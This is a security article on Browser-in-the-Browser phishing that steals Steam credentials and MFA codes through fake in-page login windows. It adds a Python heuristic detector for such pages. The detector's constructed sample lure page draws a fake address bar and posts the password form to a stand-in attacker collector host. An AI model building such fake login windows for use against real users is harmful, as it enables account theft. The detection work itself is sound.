Threat actors are using new phishing techniques to steal credentials to the digital gaming platform Steam with the intent to sell them to other users. The phishing technique used is known as a Browser-in-the-Browser attack, a sophisticated technique involving the creation of fake browser windows within the active window.
In these campaigns, targeted users receive direct messages on Steam inviting them to join a tournament for a popular video game. The message includes a link to a website for what appears to be an organization hosting eSports competitions, and signing up requires users to log in with their Steam account. This triggers what appears to be a new browser window containing the Steam login page. The window, however, is not a new browser window at all; it is a fake window drawn within the current page. It is styled to mirror the Steam login page, including the legitimate Steam URL in its address bar and the HTTPS padlock, but any credentials entered are sent to the threat actor instead. These pages are sophisticated enough to prompt for and steal MFA codes as well. Once the fake login flow completes, the page redirects the browser to a legitimate address to hide the fact that credentials were just stolen.
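The defensive takeaway from the description above is that a Browser-in-the-Browser window is not browser chrome at all: the "address bar" showing the legitimate URL and the padlock are ordinary page elements, so they are visible in the fetched HTML, and the form beneath them typically posts to a different origin than the one it displays. The following is an added example, not code from the original article or from any vendor, of a heuristic scanner that a URL sandbox or mail-security pipeline could run over fetched page source: it looks for a text node that is a bare URL for a host other than the page's real origin, sitting inside the same container as a password field. The HTML pages, the hostnames (`esports-signup.example`, `login.example-platform.test`, `collector.example-attacker.test`) and the function names are all constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# A text node that is nothing but a URL, the way an address bar renders one.
BARE_URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?:/\S*)?")
VOID_TAGS = {"input", "img", "br", "meta", "link", "hr"}
# Containers too broad to count as a "window": the URL text and the
# password field must share a tighter ancestor than the page body.
STRUCTURAL = {"#root", "html", "body"}


class _Node:
    def __init__(self, tag, attrs, parent):
        self.tag = tag
        self.attrs = {k: (v or "") for k, v in attrs}
        self.parent = parent
        self.children = []
        self.texts = []


class _TreeBuilder(HTMLParser):
    """Minimal DOM builder on top of the stdlib parser (enough for this heuristic)."""

    def __init__(self):
        super().__init__()
        self.root = _Node("#root", [], None)
        self.cur = self.root

    def handle_starttag(self, tag, attrs):
        node = _Node(tag, attrs, self.cur)
        self.cur.children.append(node)
        if tag not in VOID_TAGS:
            self.cur = node

    def handle_endtag(self, tag):
        n = self.cur
        while n is not self.root and n.tag != tag:
            n = n.parent
        if n is not self.root:
            self.cur = n.parent

    def handle_data(self, data):
        if data.strip():
            self.cur.texts.append(data.strip())


def _walk(node):
    yield node
    for child in node.children:
        yield from _walk(child)


def _has_password_field(node):
    return any(n.tag == "input" and n.attrs.get("type", "").lower() == "password"
               for n in _walk(node))


def _form_action_host(node):
    """Host the first form inside `node` submits to ('' if relative or absent)."""
    for n in _walk(node):
        if n.tag == "form":
            return (urlparse(n.attrs.get("action", "")).hostname or "").lower()
    return ""


def find_bitb_candidates(html, page_url):
    """Flag page regions that render a foreign URL next to a password prompt."""
    page_host = (urlparse(page_url).hostname or "").lower()
    parser = _TreeBuilder()
    parser.feed(html)
    findings, seen = [], set()
    for node in _walk(parser.root):
        if node.tag == "a":
            continue  # link text that happens to be a URL is normal
        for text in node.texts:
            if not BARE_URL_RE.fullmatch(text):
                continue
            shown_host = (urlparse(text).hostname or "").lower()
            if not shown_host or shown_host == page_host:
                continue  # a page printing its own origin is not suspicious
            container = node
            while container is not None and not _has_password_field(container):
                container = container.parent
            if container is None or container.tag in STRUCTURAL:
                continue
            key = (shown_host, id(container))
            if key in seen:
                continue
            seen.add(key)
            findings.append({
                "displayed_host": shown_host,      # what the fake address bar shows
                "page_host": page_host,            # where the page really lives
                "container_tag": container.tag,
                "container_id": container.attrs.get("id", ""),
                "form_action_host": _form_action_host(container),  # where creds go
            })
    return findings


# Constructed sample: a lure page drawing a fake login window inside itself.
FAKE_WINDOW_PAGE = """
<html><body>
  <h1>Tournament sign-up</h1>
  <div id="fake-window" style="position:fixed">
    <div class="titlebar">Sign in - Browser</div>
    <div class="addressbar"><span class="lock">secure</span>https://login.example-platform.test/</div>
    <form action="https://collector.example-attacker.test/post" method="post">
      <input name="user"><input type="password" name="pass">
      <button>Sign in</button>
    </form>
  </div>
  <a href="https://esports-signup.example/rules">https://esports-signup.example/rules</a>
</body></html>
"""

# Constructed sample: an ordinary login page that mentions URLs legitimately.
BENIGN_PAGE = """
<html><body>
  <p>https://docs.example/</p>
  <form action="/login" method="post">
    <div class="hint">https://esports-signup.example/</div>
    <input name="user"><input type="password" name="pass">
  </form>
  <p>Sponsored by https://sponsor.example</p>
</body></html>
"""

if __name__ == "__main__":
    for hit in find_bitb_candidates(FAKE_WINDOW_PAGE, "https://esports-signup.example/"):
        print(hit)
```

The check is deliberately narrow: it ignores anchor text, bare URLs that match the page's own origin, and URL text whose only common ancestor with a password field is the document body, which keeps a footer link or a documentation reference from triggering it. The mismatch between `displayed_host` and `form_action_host` is the strongest signal in the output, since it shows the page naming one origin while submitting credentials to another.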
At this point, the threat actors quickly hijack the Steam accounts, changing passwords and email addresses to make it more difficult for victims to regain access. This phishing method, using Browser-in-the-Browser attacks, is gaining in popularity among threat actors due to its sophisticated nature and users’ difficulty in determining that it is a phishing attempt.